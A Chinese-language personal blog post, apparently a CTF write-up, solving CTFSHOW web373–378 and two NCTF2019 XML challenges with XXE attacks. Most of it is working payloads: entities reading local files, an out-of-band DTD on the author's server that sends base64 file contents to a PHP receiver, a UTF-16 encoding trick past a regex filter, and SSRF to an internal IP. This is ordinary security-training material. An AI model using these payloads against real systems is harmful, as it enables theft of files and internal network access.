
<!DOCTYPE html>
<html lang="zh-CN ">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hoylindo || XXE-WP</title>
    <meta name="author" content="hoylindo">
    <meta name="description" content="嗨，这里是一个搭建的不太熟练的小破站 ">
    <meta name="keywords" content=" ">
    <link rel="icon" href="/1.jpg">
    <link rel="stylesheet" href="/css/antd.min.css">
    
    <link rel="stylesheet" href="/css/maiden-theme.css">
    
    <script src="/js/vue.js"></script>
    <script src="/js/antd.min.js"></script>
<meta name="generator" content="Hexo 5.4.2"></head>

<body>

    <div id="loading"
        style="height: 100vh; width: 100%; position: fixed;display: flex;z-index: 200; justify-content: space-between;">
        <div id="loadleft" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div id="loadright" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div
            style="position: fixed; height: 100vh; width: 100%;display: flex;justify-content: center;align-items: center;">
            <div id="loadcontent"
                style="width:400px;height:400px;padding:50px;border-radius:50%;display:flex;justify-content:center;align-items:center;border:solid 10px#fba3cf; text-align:center;opacity:1;transition:opacity 0.3s ease-out;">
                <div>
                    <h2>LOADING...</h2>
                    <p>dadada~</p>
                    <div>
                        <img src="/dancingkitty.gif" alt="loading">
                    </div>
                </div>
            </div>
        </div>
    </div>

    <div id="layout">
        <transition name="into">
            <div v-show="show_page" style="display: none;">
                <div id="menu_show">
                     
<nav id="menu">
    <div class="desktop-menu">
        <a href="/">
            <span class="title">Hoylindo</span>
        </a>
        
        <a href="/">
            <span>
                <a-icon type="home" theme="filled" />
            </span>
            <span>home</span>
        </a>
        
        <a href="/about">
            <span>
                <a-icon type="idcard" theme="filled" />
            </span>
            <span>about</span>
        </a>
        
        <a href="/archives">
            <span>
                <a-icon type="folder" theme="filled" />
            </span>
            <span>archives</span>
        </a>
        
        <a href="/categories">
            <span>
                <a-icon type="book" theme="filled" />
            </span>
            <span>categories</span>
        </a>
        
        <a href="/tags">
            <span>
                <a-icon type="tags" theme="filled" />
            </span>
            <span>tags</span>
        </a>
        
    </div>

    <div :class="'phone-menu ' + menu_show" id="phone-menu">
        <div :class="'title'" @click="menu_show=!menu_show">
            <span style="margin-right: 10px;">
                <a-icon type="appstore" theme="filled" />
            </span>
            <span>Hoylindo</span>
        </div>
        <div class="items" v-show="menu_show">
            
            <a href="/">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="home" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">home</div>
                </div>
            </a>
            
            <a href="/about">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="idcard" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">about</div>
                </div>
            </a>
            
            <a href="/archives">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="folder" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">archives</div>
                </div>
            </a>
            
            <a href="/categories">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="book" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">categories</div>
                </div>
            </a>
            
            <a href="/tags">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="tags" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">tags</div>
                </div>
            </a>
            
        </div>
        <div class="curtain" v-show="menu_show"></div>
    </div>

</nav>
                </div>

                <div id="main">
                     
<link rel="stylesheet" href="/css/post-body.css">
<div class="article">
    <div>
        <h1>XXE-WP </h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <a-icon type="calendar" theme="filled" />
            </span>
            2022/9/22
        </span>

        
        <span class="category">
            <a href="/categories/关于web安全">
                <span class="icon">
                    <a-icon type="book" theme="filled" />
                </span>
                关于web安全
            </a>
        </span>
        

        

        <span class="tags">
            <span class="icon">
                <a-icon type="tags" theme="filled" />
            </span>
            
            <span class="tag">
                
                <a href="/tags/XXE" style=color:#ffa2c4>
                    XXE
                </a>
            </span>
            
        </span>
        
    </div>

    <div class="content" v-pre>
        <br>

<span id="more"></span>

<h2 id="CTFSHOW"><a href="#CTFSHOW" class="headerlink" title="CTFSHOW"></a>CTFSHOW</h2><h3 id="web373"><a href="#web373" class="headerlink" title="web373"></a>web373</h3><blockquote>
<ul>
<li><p>能够看到是一个很xxe的xxe代码</p>
</li>
<li><p>直接post传：</p>
<pre><code class="xml-dtd">&lt;!DOCTYPE xxe [
&lt;!ENTITY haoye SYSTEM &quot;file:///flag&quot;&gt;
]&gt;
&lt;hhh&gt;
&lt;ctfshow&gt;&amp;haoye;&lt;/ctfshow&gt;
&lt;/hhh&gt;
</code></pre>
</li>
<li><p>得到flag</p>
</li>
</ul>
</blockquote>
<h3 id="web374-376"><a href="#web374-376" class="headerlink" title="web374~376"></a>web374~376</h3><blockquote>
<ul>
<li>没有vps，先鸽了，中秋假期再说，作业太多了呜呜呜</li>
</ul>
<p>———————————–咕咕线——————————————–</p>
<ul>
<li>有vps啦，我来了</li>
</ul>
</blockquote>
<h3 id="web374"><a href="#web374" class="headerlink" title="web374"></a>web374</h3><blockquote>
<ul>
<li><p>应该是很常规的无回显xxe，虽然我本地多次失败，还写错了vps的ip呜呜呜</p>
</li>
<li><p>新建一个<code>1.php</code>，用于接收得到的内容并写入文件：</p>
<pre><code class="php">&lt;?php 
    $a = $_GET[&#39;q&#39;];
    $myFile = &quot;flag.txt&quot;;
    file_put_contents($myFile, $a, FILE_APPEND);
</code></pre>
</li>
<li><p>payload长这样：</p>
<pre><code class="dtd">&lt;!DOCTYPE convert [ 
&lt;!ENTITY % remote SYSTEM &quot;http://[IP: xxx.xx]/1.dtd&quot;&gt;
%remote;%int;%send;
]&gt;
</code></pre>
</li>
<li><p>新建一个<code>1.dtd</code>文件：</p>
<pre><code class="dtd">&lt;!ENTITY % file SYSTEM &quot;php://filter/read=convert.base64-encode/resource=file:///flag&quot;&gt;
&lt;!ENTITY % int &quot;&lt;!ENTITY &amp;#37; send SYSTEM &#39;http://[IP: xxx.xx]/1.php?q=%file;&#39;&gt;&quot;&gt;
</code></pre>
</li>
<li><p>访问<code>flag.txt</code>，得到flag</p>
</li>
</ul>
</blockquote>
<h3 id="web375"><a href="#web375" class="headerlink" title="web375"></a>web375</h3><blockquote>
<ul>
<li><code>preg_match(&#39;/&lt;\?xml version=&quot;1\.0&quot;/&#39;, $xmlfile)</code>，过滤了xml的头，但是这个东西是可写可不写的，等于是没啥影响</li>
<li>跟上一个题一样</li>
</ul>
</blockquote>
<h3 id="web376"><a href="#web376" class="headerlink" title="web376"></a>web376</h3><blockquote>
<ul>
<li>看着好像那个过滤和375没什么区别呀</li>
<li>好吧~做法也没什么区别</li>
</ul>
</blockquote>
<h3 id="web377"><a href="#web377" class="headerlink" title="web377"></a>web377</h3><blockquote>
<ul>
<li>咕咕咕~</li>
<li>xml文档不仅可以用UTF-8编码，也可以用UTF-16(两个变体 - BE和LE)、UTF-32(四个变体 - BE、LE、2143、3412)和EBCDIC编码</li>
<li>在这种编码的帮助下，使用正则表达式可以很容易地绕过WAF，因为在这种类型的WAF中，正则表达式通常仅配置为单字符集</li>
<li>外来编码也可用于绕过成熟的WAF，因为它们并不总是能够处理上面列出的所有编码；例如，libxml2解析器只支持一种类型的utf-32 —— utf-32BE，特别是不支持BOM</li>
</ul>
<p>————————————-咕咕线———————————————</p>
<ul>
<li><p>我肥来了！</p>
</li>
<li><p><code>preg_match(&#39;/&lt;\?xml version=&quot;1\.0&quot;|http/i&#39;, $xmlfile)</code>，又过滤了http</p>
</li>
<li><p>脚本：</p>
<pre><code class="python">import requests

url = &#39;http://bb7a4789-f80a-44c3-9e6b-4ea9d1ad33dc.challenge.ctf.show/&#39;
s = &#39;&#39;&#39;&lt;!DOCTYPE convert [  
&lt;!ENTITY % remote SYSTEM &quot;http://[IP:xxx.xx]/1.dtd&quot;&gt;
%remote;%int;%send;
]&gt;&#39;&#39;&#39;
s = s.encode(&#39;utf-16&#39;)
r = requests.post(url=url, data=s)
print(r.text)
</code></pre>
</li>
</ul>
</blockquote>
<h3 id="web378"><a href="#web378" class="headerlink" title="web378"></a>web378</h3><blockquote>
<ul>
<li><p>wow，是熟悉的感觉！和昨天那个NCTF的差不多，但是昨天那个最后爆破到失去耐心，wp也还没写</p>
</li>
<li><p>这个好好写一下吧</p>
</li>
<li><p>首先看到是一个登录界面，随便输入<code>admin,admin</code>尝试登录失败，页面回显<code>admin login fail!</code></p>
</li>
<li><p>抓包，可以看到账号密码的提交格式是：</p>
<pre><code class="xml">&lt;user&gt;&lt;username&gt;111&lt;/username&gt;&lt;password&gt;222&lt;/password&gt;&lt;/user&gt;
</code></pre>
</li>
<li><p>repeater返回的是：</p>
<pre><code class="xml">&lt;result&gt;&lt;code&gt;0&lt;/code&gt;&lt;msg&gt;111&lt;/msg&gt;&lt;/result&gt;
</code></pre>
</li>
<li><p>构造payload：</p>
<pre><code class="xml-dtd">&lt;!DOCTYPE xml [
        &lt;!ENTITY haoye SYSTEM &quot;file:///flag&quot;&gt;
]&gt; 
&lt;user&gt;&lt;username&gt;&amp;haoye;&lt;/username&gt;&lt;password&gt;222&lt;/password&gt;&lt;/user&gt;
</code></pre>
</li>
<li><p>返回flag</p>
</li>
</ul>
</blockquote>
<h2 id="BUU"><a href="#BUU" class="headerlink" title="BUU"></a>BUU</h2><h3 id="NCTF2019-True-XML-cookbook"><a href="#NCTF2019-True-XML-cookbook" class="headerlink" title="[NCTF2019]True XML cookbook"></a>[NCTF2019]True XML cookbook</h3><blockquote>
<ul>
<li><p>补一下昨天的</p>
</li>
<li><p>思路和上边378差不多，但是在读文件的时候开始陷入深深的疑惑</p>
</li>
<li><p>读<code>/etc/passwd</code>但是没有啥有用的内容</p>
</li>
<li><p>然后是这样：</p>
<pre><code class="xml-dtd">&lt;!DOCTYPE xml [
        &lt;!ENTITY haoye SYSTEM &quot;file:///proc/net/fib_trie&quot;&gt;
]&gt; 
&lt;user&gt;&lt;username&gt;&amp;haoye;&lt;/username&gt;&lt;password&gt;111&lt;/password&gt;&lt;/user&gt;
</code></pre>
</li>
<li><p>找到了一个正确的IP，然后通过bp爆破，找到一个可以访问的IP，最后的payload长这样：</p>
<pre><code class="xml-dtd">&lt;!DOCTYPE xml [
        &lt;!ENTITY haoye SYSTEM &quot;http://10.244.80.142&quot;&gt;
]&gt; 
&lt;user&gt;&lt;username&gt;&amp;haoye;&lt;/username&gt;&lt;password&gt;111&lt;/password&gt;&lt;/user&gt;
</code></pre>
</li>
</ul>
</blockquote>
<h3 id="NCTF2019-Fake-XML-cookbook"><a href="#NCTF2019-Fake-XML-cookbook" class="headerlink" title="[NCTF2019]Fake XML cookbook"></a>[NCTF2019]Fake XML cookbook</h3><blockquote>
<ul>
<li><p>直接拿上边378的payload，回显flag</p>
<pre><code class="xml-dtd">&lt;!DOCTYPE xml [
        &lt;!ENTITY haoye SYSTEM &quot;file:///flag&quot;&gt;
]&gt; 
&lt;user&gt;&lt;username&gt;&amp;haoye;&lt;/username&gt;&lt;password&gt;222&lt;/password&gt;&lt;/user&gt;
</code></pre>
</li>
</ul>
</blockquote>

    </div>

    
</div>
                     
<footer id="footer">
    <div class="footer-wrap">
        <div>
            © 2022 - 2023 Hoylindo
            <span class="footer-icon">
                <a-icon type="flag" theme="filled" /></span>
            @hoylindo
        </div>
        <div></div>
        <div>Based on the <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo Engine</a> & <a
                target="_blank" rel="noopener" href="https://github.com/korilin/hexo-theme-particle">Particle Theme</a></div>
        
    </div>

</footer>

<script src="/js/highlight.min.js"></script>
<script src="/js/particle.js"></script>
                </div>
            </div>
        </transition>
    </div>

    <canvas id="background" style="position:fixed;top:0;left:0;width:100vw;height:100vh;pointer-events:none;z-index:-1" ></canvas> 
    <script src="/js/1.js"></script>
    
    <canvas class="fireworks" style="position: fixed; left: 0; top: 0; z-index: 99999999; pointer-events: none;"></canvas>
    <script type="text/javascript" src="/js/aixin.js"></script>
    <script type="text/javascript" src="/js/anime.min.js"></script>
    <script type="text/javascript" src="/js/fireworks.js"></script>

    <script>
    new Vue({
        el: "#layout",
        data: {
            show_page: false,
            onload_menu: false,
            menu_show: false,
            card_top: 100
        },
        created: function () {
            var that = this
            window.onload = function () {
                that.show_page = true
                document.getElementById("loadcontent").style.opacity = 0
                setTimeout(function () {
                    document.getElementById("loadleft").style.width = 0
                    document.getElementById("loadright").style.width = 0
                }, 300)
                setTimeout(function () {
                    document.getElementById("loading").style = "display:none"
                }, 600)
            }
        },
        mounted: function () {
            var that = this
            window.addEventListener('scroll', function (e) {
                that.menu_show = false
            })
        },
        methods: {
            home_click: function () {
                window.scrollTo({
                    top: window.innerHeight - 80,
                    behavior: "smooth",
                });
            }
        }
    })
</script>

</body>

</html>